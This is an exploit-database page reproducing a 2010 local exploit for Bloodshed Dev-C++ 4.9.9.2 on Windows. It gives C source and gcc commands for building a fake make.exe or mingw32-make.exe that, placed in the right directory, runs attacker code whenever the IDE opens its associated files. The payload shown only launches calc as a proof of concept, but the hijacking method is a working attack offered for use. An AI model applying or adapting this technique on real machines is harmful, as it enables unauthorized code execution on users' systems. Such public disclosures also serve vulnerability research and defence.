[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Bloodshed Dev-C++ Binary Hijacking (make.exe, mingw32-make.exe)

Author
sToRm
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-13835
Category
local exploits
Date add
25-08-2010
Platform
windows
===============================================================
Bloodshed Dev-C++ Binary Hijacking (make.exe, mingw32-make.exe)
===============================================================

/*
Exploit Title: Bloodshed Dev-C++ Binary Hijacking Exploit (make.exe, mingw32-make.exe)
Date: August 25, 2010
Author: storm (storm@gonullyourself.org)
Version: 4.9.9.2
Tested on: Windows Vista SP2

http://www.gonullyourself.org/

gcc -o make.exe Dev-C++-Binary.c
gcc -o mingw32-make.exe Dev-C++-Binary.c

...and place in appropriate directory.  Executes your code four times.

Every file extension associated with Dev-C++ (.c, .cpp, .dev, .h, .hpp, .rc, .template) is affected.  Dev-C++ Package Manager files (.devpackage, .devpak) are not affected, however.

*/

#include <windows.h>

int main()
{
  WinExec("calc", 0);
  exit(0);
  return 0;
}



#  0day.today [2024-10-06]  #